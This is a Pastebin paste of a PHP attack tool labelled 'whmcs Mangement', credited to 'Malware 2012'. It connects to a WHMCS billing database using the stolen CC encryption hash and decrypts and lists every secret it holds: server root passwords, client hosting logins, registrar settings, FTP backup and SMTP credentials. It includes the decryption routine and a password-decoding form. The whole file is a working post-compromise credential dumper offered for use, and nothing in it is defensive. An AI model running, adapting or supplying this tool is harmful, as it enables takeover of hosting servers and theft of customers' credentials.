Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- /*
- * whmcs Mangement
- * First codes by rab3oun Recoded By Malware 2012
- * Add clients roots & client account
- */
- ob_start();
- $login = ($_COOKIE['login'] == "ok") ? true:false;
- ?>
- <html>
- <head>
- <title>403 Malware</title>
- <style>
- *{
- font-family: tahoma;
- font-size: 12px;
- }
- #index{
- margin: 0 150;
- }
- #header{
- padding: 50px;
- border:1px solid #000;
- }
- #navbar{
- border-left:1px solid #000;
- border-right:1px solid #000;
- border-bottom:1px solid #000;
- background:#000;
- }
- #navbar ul{
- list-style-type: none;
- margin:0;
- padding: 0;
- overflow: hidden;
- }
- #navbar ul li{
- float:left;
- }
- #navbar ul li a{
- display: block ;
- text-decoration: none;
- padding: 10px;
- color:#fff;
- }
- #navbar ul li a:hover{
- background: #fff;
- color: #000;
- }
- #content{
- padding: 10px;
- border-left:1px solid #000;
- border-right:1px solid #000;
- text-align: center;
- }
- #footer{
- text-align: center;
- padding: 4px;
- border:1px solid #000;
- }
- </style>
- </head>
- <body>
- <div id="index">
- <div id="header"><a href="?">whmcs Mangement</a></div>
- <div id="navbar">
- <ul>
- <li><a href="?">Home</a></li>
- <li><a href="?dp">Decode Pass</a></li>
- <?
- if($login){
- echo '
- <li><a href="?hostr00ts">Host r00ts</a></li>
- <li><a href="?Clientsr00ts">Clients r00ts</a></li>
- <li><a href="?Clientsinfos">Clients infos</a></li>
- <li><a href="?domains">Domains</a></li>
- <li><a href="?backup">Backup Infos</a></li>
- <li><a href="?smtp">SMTP Infos</a></li>
- <li><a href="?logout">Logout</a></li>
- ';
- }
- ?>
- </ul>
- </div>
- <div id="content">
- <?
- if(isset($_GET['dp'])){
- if($_POST[pass] & $_POST[hash]){
- echo "Decode Pass : <b>".decrypt($_POST[pass], $_POST[hash])."</b>";
- }
- echo "<form action='' method='POST'>
- <table border='0' cellpadding='5' align='center'>
- <tr><td>Pass</td><td><input type='text' name='pass' value='{$_POST[pass]}'/></td></tr>
- <tr><td>CC Encryption Hash</td><td><input type='text' name='hash' value='{$_POST[hash]}'/></td></tr>
- <tr><td colspan='2' align='center'><input type='submit' value='Decode'/></td></tr>
- </table>
- </form>";
- }
- if($_POST['ok'] == "Connect"){
- if(!$_POST['host'] or !$_POST['user'] or !$_POST['pass'] or !$_POST['db'] or !$_POST['hash']){
- echo "Error : Please Fill All inputs !";
- }else{
- if(@mysql_connect($_POST['host'],$_POST['user'],$_POST['pass']) && mysql_select_db($_POST['db'])){
- echo "Done : Connection Successfully
- <meta http-equiv='refresh' content='1;URL=?hostr00ts' />
- ";
- setcookie("host",$_POST['host']);
- setcookie("user",$_POST['user']);
- setcookie("pass",$_POST['pass']);
- setcookie("db",$_POST['db']);
- setcookie("hash",$_POST['hash']);
- setcookie("login","ok");
- ob_end_flush();
- }else{
- echo "Error : Check MySQL infos";
- }
- }
- }
- if(!$login && !$_GET){
- echo '<form action="" method="post">
- <table border="0" cellpadding="5" align="center">
- <tr><td>Host</td><td>: <input type="text" name="host" value="'.$_POST[host].'"></td></tr>
- <tr><td>user</td><td>: <input type="text" name="user" value="'.$_POST[user].'"></td></tr>
- <tr><td>pass</td><td>: <input type="text" name="pass" value="'.$_POST[pass].'"></td></tr>
- <tr><td>db</td><td>: <input type="text" name="db" value="'.$_POST[db].'"></td></tr>
- <tr><td>hash</td><td>: <input type="text" name="hash" value="'.$_POST[hash].'"></td></tr>
- <tr><td colspan="2" align="center"><input type="submit" value="Connect" name="ok"></td></tr>
- </table>
- </form>';
- }elseif($login){
- mysql_connect($_COOKIE['host'] , $_COOKIE['user'] , $_COOKIE['pass']);
- mysql_select_db($_COOKIE['db']);
- $cc_encryption_hash = $_COOKIE['hash'];
- if(!$_GET){
- echo '<form action="" method="post">
- <table border="0" cellpadding="5" align="center">
- <tr><td>Host</td><td>: <input type="text" name="host" value="'.$_COOKIE[host].'"></td></tr>
- <tr><td>user</td><td>: <input type="text" name="user" value="'.$_COOKIE[user].'"></td></tr>
- <tr><td>pass</td><td>: <input type="text" name="pass" value="'.$_COOKIE[pass].'"></td></tr>
- <tr><td>db</td><td>: <input type="text" name="db" value="'.$_COOKIE[db].'"></td></tr>
- <tr><td>hash</td><td>: <input type="text" name="hash" value="'.$_COOKIE[hash].'"></td></tr>
- <tr><td colspan="2" align="center"><input type="submit" value="Connect" name="ok"></td></tr>
- </table>
- </form>';
- }elseif(isset($_GET['domains'])){
- $query = mysql_query("SELECT * FROM tblregistrars");
- echo "<table border='1' align='center' cellpadding='5'>
- <tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>";
- while($v = mysql_fetch_array($query)) {
- $value = (!decrypt($v['value'], $cc_encryption_hash)) ? "0":decrypt($v['value'], $cc_encryption_hash);
- echo "<tr><td>{$v['registrar']}</td><td>{$v['setting']}</td><td>$value</td></tr>" ;
- }
- echo "</table>";
- }elseif(isset($_GET['Clientsinfos'])){
- $query = mysql_query("SELECT * FROM tblhosting");
- echo "<table border='1' cellpadding='5' align='center'>
- <tr><td>domain</td><td>User</td><td>Pass</td><td>IP's</td></tr>";
- while($v = mysql_fetch_array($query)) {
- echo "<tr><td>{$v['domain']}</td><td>{$v['username']}</td><td>".decrypt ($v['password'], $cc_encryption_hash)."</td><td>{$v
- ['assignedips']}</td></tr>";
- }
- echo "</table>";
- }elseif(isset($_GET['Clientsr00ts'])){
- $query = mysql_query("SELECT * FROM tblhosting where username = 'root'");
- echo "<table border='1' cellpadding='5' align='center'>
- <tr><td>domain</td><td>User</td><td>Pass</td><td>IP's</td></tr>";
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='4' align='center'>Nothing Found !</td></tr>";
- }
- while($v = mysql_fetch_array($query)) {
- echo "<tr><td>{$v['domain']}</td><td>{$v['username']}</td><td>".decrypt ($v['password'], $cc_encryption_hash)."</td><td>{$v
- ['assignedips']}</td></tr>";
- }
- echo "</table>";
- }elseif(isset($_GET['hostr00ts'])){
- $query = mysql_query("SELECT * FROM tblservers");
- echo "<table border='1' cellpadding='5' align='center'>
- <tr><td>Type</td><td>Active</td><td>IP Address</td><td>username</td><td>Password</td></tr>";
- while($v = mysql_fetch_array($query)) {
- echo "<tr>
- <td>{$v['type']}</td><td>{$v['active']}</td><td>{$v['ipaddress']}</td><td>{$v['username']}</td><td>".decrypt($v['password'],
- $cc_encryption_hash)."</td>
- </tr>";
- }
- echo "</table>";
- }elseif(isset($_GET['backup'])){
- $query = mysql_query("SELECT * FROM tblconfiguration where 1");
- echo "<table border='1' cellpadding='5' align='center'>";
- $wht = array('FTPBackupHostname','FTPBackupUsername','FTPBackupPassword','FTPBackupDestination');
- while($row = mysql_fetch_array($query)){
- if($row[setting] == $wht[0]){
- echo "<tr><td>Hostname</td><td>{$row[value]}</td></tr>"; $wht[0] = xxx;
- }elseif($row[setting] == $wht[1]){
- echo "<tr><td>Username</td><td>{$row[value]}</td></tr>"; $wht[1] = xxx;
- }elseif($row[setting] == $wht[2]){
- echo "<tr><td>Password</td><td>{$row[value]}</td></tr>"; $wht[2] = xxx;
- }elseif($row[setting] == $wht[3]){
- echo "<tr><td>Destination</td><td>{$row[value]}</td></tr>"; $wht[3] = xxx;
- }
- }
- echo "</table>";
- }elseif(isset($_GET['smtp'])){
- $query = mysql_query("SELECT * FROM tblconfiguration where 1");
- echo "<table border='1' cellpadding='5' align='center'>";
- while($row = mysql_fetch_array($query)){
- if($row[setting] == 'SMTPHost'){
- echo "<tr><td>Hostname</td><td>{$row[value]}</td></tr>";
- }elseif($row[setting] == 'SMTPUsername'){
- echo "<tr><td>Username</td><td>{$row[value]}</td></tr>";
- }elseif($row[setting] == 'SMTPPassword'){
- echo "<tr><td>Password</td><td>{$row[value]}</td></tr>";
- }elseif($row[setting] == 'SMTPPort'){
- echo "<tr><td>Port</td><td>{$row[value]}</td></tr>";
- }
- }
- echo "</table>";
- }elseif(isset($_GET['logout'])){
- foreach($_COOKIE as $name=>$value){ setcookie($name,0); }
- echo "Thanks For Using Me xD <meta http-equiv='refresh' content='1;URL=?' />";
- }
- }
- ?>
- </div>
- <div id="footer">First Codes by Rab3oun Moded By Lagripe-Dz © 2011 Recoded Malware 2012</div>
- </div>
- </body>
- </html>
- <?
- function decrypt ($string,$cc_encryption_hash)
- {
- $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
- $hash_key = _hash ($key);
- $hash_length = strlen ($hash_key);
- $string = base64_decode ($string);
- $tmp_iv = substr ($string, 0, $hash_length);
- $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
- $iv = $out = '';
- $c = 0;
- while ($c < $hash_length)
- {
- $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
- ++$c;
- }
- $key = $iv;
- $c = 0;
- while ($c < strlen ($string))
- {
- if (($c != 0 AND $c % $hash_length == 0))
- {
- $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
- }
- $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
- ++$c;
- }
- return $out;
- }
- function _hash ($string)
- {
- $hash = (function_exists ('sha1')) ? sha1($string):md5($string);
- $out = '';
- $c = 0;
- while ($c < strlen ($hash))
- {
- $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
- $c += 2;
- }
- return $out;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement